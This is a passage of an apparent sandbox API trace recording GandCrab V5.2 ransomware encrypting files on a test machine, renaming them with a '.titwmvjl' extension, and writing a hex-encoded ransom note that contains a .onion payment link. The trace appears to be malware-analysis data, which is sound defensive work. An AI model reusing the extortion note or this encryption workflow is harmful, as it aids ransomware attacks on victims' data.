phProv=0x259e6b0*=0x4c9980) returned 1 [0090.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.146] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5039b8) returned 1 [0090.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.147] CryptGetKeyParam (in: hKey=0x5039b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.147] CryptEncrypt (in: hKey=0x5039b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.147] GetLastError () returned 0x0 [0090.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.147] CryptDestroyKey (hKey=0x5039b8) returned 1 [0090.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.147] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.148] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.149] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0090.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.149] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.149] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.149] GetLastError () returned 0x0 [0090.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.150] CryptDestroyKey (hKey=0x503738) returned 1 [0090.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.150] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.150] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.150] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.150] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x15516, lpOverlapped=0x0) returned 1 [0090.157] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffeaaea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.157] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15516, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x15516, lpOverlapped=0x0) returned 1 [0090.160] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.160] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0090.161] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.165] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.165] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.166] CloseHandle (hObject=0x2d4) returned 1 [0090.166] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\cjvf42pem2_iaxq8x.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\cjvf42pem2_iaxq8x.csv.titwmvjl"), dwFlags=0x1) returned 1 [0090.167] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.167] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.167] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.167] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.167] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock" [0090.167] lstrlenW (lpString=".titwmvjl") returned 9 [0090.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock") returned 121 [0090.167] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.168] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 130 [0090.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock") returned 121 [0090.168] lstrlenW (lpString=".lock") returned 5 [0090.168] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.168] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.168] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.168] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.168] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.168] lstrcmpW (lpString1="fV1MCunDF-l", lpString2=".") returned 1 [0090.168] lstrcmpW (lpString1="fV1MCunDF-l", lpString2="..") returned 1 [0090.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="fV1MCunDF-l" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l" [0090.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\" [0090.169] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0090.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.170] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.170] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.170] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.170] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\\\TITWMVJL-DECRYPT.txt") returned 130 [0090.170] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0090.170] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\